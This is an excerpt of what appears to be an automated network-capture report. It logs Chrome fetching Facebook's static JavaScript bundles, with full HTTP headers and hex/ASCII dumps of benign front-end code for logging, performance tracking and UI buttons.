                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: s+qWajxrVjsDCgd3NAvS22cRb38EpIDgWInSz1Poohw0qGXzHhGP3ESwA6D6+CO9u4bYbKHjpNSvuc/tOOGNOA==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:20 GMT
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=101, rtx=0, c=14, mss=1392, tbw=3411, tp=-1, tpl=-1, uplat=5, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 28815
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC15872INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 42 61 6e 7a 61 69 41 64 61 70 74 65 72 22 2c 5b 22 63 72 3a 35 38 36 36 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 62 28 22 63 72 3a 35 38 36 36 22 29 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 42 61 6e 7a 61 69 43 6f 6e 73 74 73 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 61 3d 7b 53 45 4e 44 3a 22 42 61 6e 7a 61 69 3a 53 45 4e 44 22 2c 4f 4b 3a 22 42 61 6e 7a 61 69 3a 4f 4b 22 2c 45 52 52 4f 52 3a 22 42 61 6e 7a 61 69 3a 45 52 52 4f 52 22 2c 53 48 55 54 44 4f 57 4e 3a 22 42 61 6e 7a 61 69 3a 53 48 55 54 44 4f 57 4e 22 2c 42 41 53 49 43 3a 22 62 61 73 69 63 22 2c 56 49 54
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("BanzaiAdapter",["cr:5866"],(function(a,b,c,d,e,f,g){g["default"]=b("cr:5866")}),98);__d("BanzaiConsts",[],(function(a,b,c,d,e,f){a={SEND:"Banzai:SEND",OK:"Banzai:OK",ERROR:"Banzai:ERROR",SHUTDOWN:"Banzai:SHUTDOWN",BASIC:"basic",VIT
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC12942INData Raw: 65 3d 73 28 61 2c 6a 2c 68 2d 6a 2c 64 2c 65 29 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 77 28 61 2c 62 2c 63 29 7b 64 6f 20 62 5b 63 5d 3d 61 26 31 32 37 2c 61 3d 61 3e 3e 3e 37 2c 61 3e 30 26 26 28 62 5b 63 5d 2b 3d 31 32 38 29 2c 63 2b 3d 31 3b 77 68 69 6c 65 28 61 3e 30 29 3b 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 78 28 61 29 7b 74 68 69 73 2e 61 72 72 61 79 3d 61 7d 78 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 61 78 43 6f 6d 70 72 65 73 73 65 64 4c 65 6e 67 74 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2e 61 72 72 61 79 2e 6c 65 6e 67 74 68 3b 72 65 74 75 72 6e 20 33 32 2b 61 2b 4d 61 74 68 2e 66 6c 6f 6f 72 28 61 2f 36 29 7d 3b 78 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6d 70 72 65 73 73 54 6f 42
                                                                                                                                                                                                                                  Data Ascii: e=s(a,j,h-j,d,e));return e}function w(a,b,c){do b[c]=a&127,a=a>>>7,a>0&&(b[c]+=128),c+=1;while(a>0);return c}function x(a){this.array=a}x.prototype.maxCompressedLength=function(){var a=this.array.length;return 32+a+Math.floor(a/6)};x.prototype.compressToB


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  55192.168.2.649784157.240.251.94431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC581OUTGET /rsrc.php/v3/yC/r/9NORmZkKZyv.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC1944INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: /HmydUFwcPwAUig9l7tbMQ==
                                                                                                                                                                                                                                  Expires: Sat, 20 Sep 2025 11:53:55 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: QhR1YiV7T8klaasjelQF27hHrirwdOba7Q+YOT0KDr0+HuIU3C7xCU1K4OJRY++HWAk19KiqnMLgqULFpjJI6A==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:20 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=94, rtx=0, c=14, mss=1392, tbw=3413, tp=-1, tpl=-1, uplat=1, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 59956
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC15873INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 43 4c 53 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 67 3d 74 79 70 65 6f 66 20 28 28 62 3d 77 69 6e 64 6f 77 2e 50 65 72 66 6f 72 6d 61 6e 63 65 4f 62 73 65 72 76 65 72 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 28 63 3d 62 2e 73 75 70 70 6f 72 74 65 64 45 6e 74 72 79 54 79 70 65 73 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 63 2e 69 6e 63 6c 75 64 65 73 29 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 77 69 6e 64 6f 77 2e 50 65 72 66 6f 72 6d 61 6e 63 65 4f 62 73 65 72 76 65 72 2e 73 75 70 70 6f 72 74 65 64 45 6e 74 72 79 54 79 70 65 73 2e 69 6e 63 6c 75 64 65 73 28 22 6c 61 79 6f 75 74 2d 73
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("CLS",[],(function(a,b,c,d,e,f){"use strict";var g=typeof ((b=window.PerformanceObserver)==null?void 0:(c=b.supportedEntryTypes)==null?void 0:c.includes)==="function"&&window.PerformanceObserver.supportedEntryTypes.includes("layout-s
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC16384INData Raw: 3d 6e 75 6c 6c 3f 6e 75 6c 6c 3a 7b 63 6c 61 73 73 4e 61 6d 65 3a 28 63 3d 61 2e 65 6c 65 6d 65 6e 74 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 63 2e 63 6c 61 73 73 4e 61 6d 65 2c 65 6c 65 6d 65 6e 74 3a 28 63 3d 61 2e 65 6c 65 6d 65 6e 74 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 63 2e 74 61 67 4e 61 6d 65 2c 73 69 7a 65 3a 61 2e 73 69 7a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 61 2e 73 74 61 72 74 54 69 6d 65 2c 75 72 6c 3a 61 2e 75 72 6c 7d 7d 7d 66 2e 67 65 74 4c 43 50 43 61 6c 6c 62 61 63 6b 3d 61 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 52 65 73 6f 75 72 63 65 44 6f 77 6e 6c 6f 61 64 4c 6f 67 67 65 72 22 2c 5b 22 70 65 72 66 6f 72 6d 61 6e 63 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74
                                                                                                                                                                                                                                  Data Ascii: =null?null:{className:(c=a.element)==null?void 0:c.className,element:(c=a.element)==null?void 0:c.tagName,size:a.size,timestamp:a.startTime,url:a.url}}}f.getLCPCallback=a}),66);__d("ResourceDownloadLogger",["performance"],(function(a,b,c,d,e,f,g){"use st
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC16384INData Raw: 70 50 69 78 65 6c 73 3a 30 2c 63 73 73 42 67 45 6c 65 6d 65 6e 74 73 3a 41 72 72 61 79 2e 66 72 6f 6d 28 74 68 69 73 2e 63 73 73 42 67 45 6c 65 6d 65 6e 74 73 2e 76 61 6c 75 65 73 28 29 29 2c 65 6c 65 6d 65 6e 74 73 3a 74 68 69 73 2e 24 32 2c 66 69 6e 61 6c 53 63 72 6f 6c 6c 59 3a 74 68 69 73 2e 24 31 32 2c 69 6d 67 4e 75 6d 3a 30 2c 69 6d 67 50 69 78 65 6c 73 3a 30 2c 69 6e 69 74 69 61 6c 53 63 72 6f 6c 6c 59 3a 74 68 69 73 2e 69 6e 69 74 69 61 6c 53 63 72 6f 6c 6c 59 2c 69 6e 74 65 72 61 63 74 69 6f 6e 54 79 70 65 3a 74 68 69 73 2e 69 6e 74 65 72 61 63 74 69 6f 6e 54 79 70 65 2c 6c 6f 61 64 69 6e 67 45 6c 65 6d 65 6e 74 73 3a 74 68 69 73 2e 24 35 2c 6d 61 72 6b 65 72 50 6f 69 6e 74 73 3a 74 68 69 73 2e 6d 61 72 6b 65 72 50 6f 69 6e 74 73 2c 6e 61 76 43
                                                                                                                                                                                                                                  Data Ascii: pPixels:0,cssBgElements:Array.from(this.cssBgElements.values()),elements:this.$2,finalScrollY:this.$12,imgNum:0,imgPixels:0,initialScrollY:this.initialScrollY,interactionType:this.interactionType,loadingElements:this.$5,markerPoints:this.markerPoints,navC
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC11314INData Raw: 65 74 28 61 29 3b 69 66 28 62 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 62 2e 63 61 6c 6c 62 61 63 6b 28 29 3b 62 2e 65 78 65 63 75 74 65 4f 6e 63 65 26 26 6a 2e 24 56 69 73 75 61 6c 43 6f 6d 70 6c 65 74 69 6f 6e 54 72 61 63 69 6e 67 24 70 5f 38 5b 22 64 65 6c 65 74 65 22 5d 28 61 29 7d 29 7d 3b 64 28 22 57 65 62 41 50 49 73 22 29 2e 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 26 26 28 6a 2e 6d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 3d 6e 65 77 28 64 28 22 57 65 62 41 50 49 73 22 29 2e 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 29 28 6a 2e 6d 75 74 61 74 69 6f 6e 52 65 63 6f 72 64 48 61 6e 64 6c 65 72 29 29 3b 64 28 22 57 65 62 41 50 49 73 22 29 2e 49 6e 74 65 72 73 65 63 74 69 6f 6e 4f 62 73 65 72 76 65 72 26 26 28 6a 2e 6c 6f 61 64 69 6e
                                                                                                                                                                                                                                  Data Ascii: et(a);if(b==null)return;b.callback();b.executeOnce&&j.$VisualCompletionTracing$p_8["delete"](a)})};d("WebAPIs").MutationObserver&&(j.mutationObserver=new(d("WebAPIs").MutationObserver)(j.mutationRecordHandler));d("WebAPIs").IntersectionObserver&&(j.loadin


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  56192.168.2.649783157.240.251.94431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC581OUTGET /rsrc.php/v3/yT/r/wc_C9ZEewR3.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC1944INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: MNmf+dATD/FezUb5xIFrpg==
                                                                                                                                                                                                                                  Expires: Fri, 19 Sep 2025 18:49:06 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: oXKJfhzoWxN/Y1MUAUik2MkwdsOkekGDQVV/S0KxWyhqFhZW3TRZyj5bJ6YcaBAy7EGk6xAzbhpwTo85NmfgLg==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:20 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=95, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=3, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 45002
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC15871INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 41 63 74 6f 72 55 52 49 22 2c 5b 22 41 63 74 6f 72 55 52 49 43 6f 6e 66 69 67 22 2c 22 55 52 49 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 76 61 72 20 68 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 6e 65 77 28 68 7c 7c 28 68 3d 63 28 22 55 52 49 22 29 29 29 28 61 29 2e 61 64 64 51 75 65 72 79 44 61 74 61 28 63 28 22 41 63 74 6f 72 55 52 49 43 6f 6e 66 69 67 22 29 2e 50 41 52 41 4d 45 54 45 52 5f 41 43 54 4f 52 2c 62 29 7d 67 2e 63 72 65 61 74 65 3d 61 3b 67 2e 50 41 52 41 4d 45 54 45 52 5f 41 43 54 4f 52 3d 63 28 22 41 63 74 6f 72 55 52 49 43 6f 6e 66 69 67 22 29 2e 50 41 52 41 4d 45 54 45 52 5f 41 43 54 4f 52 7d 29 2c
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("ActorURI",["ActorURIConfig","URI"],(function(a,b,c,d,e,f,g){var h;function a(a,b){return new(h||(h=c("URI")))(a).addQueryData(c("ActorURIConfig").PARAMETER_ACTOR,b)}g.create=a;g.PARAMETER_ACTOR=c("ActorURIConfig").PARAMETER_ACTOR}),
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC16384INData Raw: 2e 66 6c 61 74 74 65 6e 54 6f 41 72 72 61 79 28 29 3a 61 7d 29 2c 64 3d 62 28 22 66 6c 61 74 74 65 6e 41 72 72 61 79 22 29 28 64 29 29 3b 72 65 74 75 72 6e 20 62 28 22 63 72 3a 36 31 31 34 22 29 2e 63 72 65 61 74 65 28 61 2c 63 2c 64 29 7d 3b 67 5b 61 5d 3d 63 7d 29 3b 65 2e 65 78 70 6f 72 74 73 3d 67 7d 29 2c 6e 75 6c 6c 29 3b 0a 5f 5f 64 28 22 4c 69 6e 6b 43 6f 6e 74 72 6f 6c 6c 65 72 22 2c 5b 22 44 61 74 61 53 74 6f 72 65 22 2c 22 45 76 65 6e 74 22 2c 22 50 61 72 65 6e 74 22 2c 22 72 65 6d 6f 76 65 46 72 6f 6d 41 72 72 61 79 22 2c 22 74 72 61 63 6b 52 65 66 65 72 72 65 72 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 76 61 72 20 68 3d 22 40 40 4c 69 6e 6b 43 6f 6e 74 72 6f 6c 6c 65 72 22 2c 69 3d 5b 5d 2c 6a 3d 5b
                                                                                                                                                                                                                                  Data Ascii: .flattenToArray():a}),d=b("flattenArray")(d));return b("cr:6114").create(a,c,d)};g[a]=c});e.exports=g}),null);__d("LinkController",["DataStore","Event","Parent","removeFromArray","trackReferrer"],(function(a,b,c,d,e,f,g){var h="@@LinkController",i=[],j=[
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC12746INData Raw: 49 6e 73 74 61 6e 63 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 61 3b 77 68 69 6c 65 28 61 29 7b 76 61 72 20 65 3d 64 28 22 44 61 74 61 53 74 6f 72 65 22 29 2e 67 65 74 28 61 2c 22 74 6f 67 67 6c 65 72 22 29 3b 69 66 28 65 29 72 65 74 75 72 6e 20 65 3b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 6c 65 6d 65 6e 74 29 69 66 28 64 28 22 43 53 53 22 29 2e 68 61 73 43 6c 61 73 73 28 61 2c 22 75 69 54 6f 67 67 6c 65 43 6f 6e 74 65 78 74 22 29 29 72 65 74 75 72 6e 20 62 2e 63 72 65 61 74 65 49 6e 73 74 61 6e 63 65 28 61 29 3b 65 6c 73 65 20 69 66 28 21 63 28 22 6b 69 6c 6c 73 77 69 74 63 68 22 29 28 22 4a 45 57 45 4c 5f 54 4f 47 47 4c 45 52 5f 49 4e 53 54 41 4e 43 45 5f 46 49 58 45 53 22 29 26 26 64 28 22 43 53 53 22 29 2e 68 61 73 43 6c 61 73 73 28
                                                                                                                                                                                                                                  Data Ascii: Instance=function(a){a=a;while(a){var e=d("DataStore").get(a,"toggler");if(e)return e;if(a instanceof Element)if(d("CSS").hasClass(a,"uiToggleContext"))return b.createInstance(a);else if(!c("killswitch")("JEWEL_TOGGLER_INSTANCE_FIXES")&&d("CSS").hasClass(


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  57192.168.2.649779157.240.251.94431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC581OUTGET /rsrc.php/v3/y8/r/fCWCnWQldVh.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC1945INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: a5N7LjU0LqOqa0IWOh0OgA==
                                                                                                                                                                                                                                  Expires: Fri, 19 Sep 2025 22:02:32 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: z+eUsXJGlRWIQlFPi4xhesUYmok1gLRcGte9QJV++PV37y+9Xv9TwwUdfwo6lNmiOUoidz1QhujrlQVHGokvIw==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:20 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=100, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=1, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 10762
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC10761INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 42 75 74 74 6f 6e 22 2c 5b 22 63 73 78 22 2c 22 63 78 22 2c 22 69 6e 76 61 72 69 61 6e 74 22 2c 22 43 53 53 22 2c 22 44 4f 4d 22 2c 22 44 61 74 61 53 74 6f 72 65 22 2c 22 45 76 65 6e 74 22 2c 22 50 61 72 65 6e 74 22 2c 22 65 6d 70 74 79 46 75 6e 63 74 69 6f 6e 22 2c 22 69 73 4e 6f 64 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 2c 69 2c 6a 29 7b 76 61 72 20 6b 3d 22 75 69 42 75 74 74 6f 6e 44 69 73 61 62 6c 65 64 22 2c 6c 3d 22 75 69 42 75 74 74 6f 6e 44 65 70 72 65 73 73 65 64 22 2c 6d 3d 22 5f 34 32 66 72 22 2c 6e 3d 22 5f 34 32 66 73 22 2c 6f 3d 22 62 75 74 74 6f 6e 3a 62 6c 6f 63 6b 65 72 22 2c 70 3d 22 68 72 65 66 22 2c 71 3d 22 61 6a 61 78
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("Button",["csx","cx","invariant","CSS","DOM","DataStore","Event","Parent","emptyFunction","isNode"],(function(a,b,c,d,e,f,g,h,i,j){var k="uiButtonDisabled",l="uiButtonDepressed",m="_42fr",n="_42fs",o="button:blocker",p="href",q="ajax


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
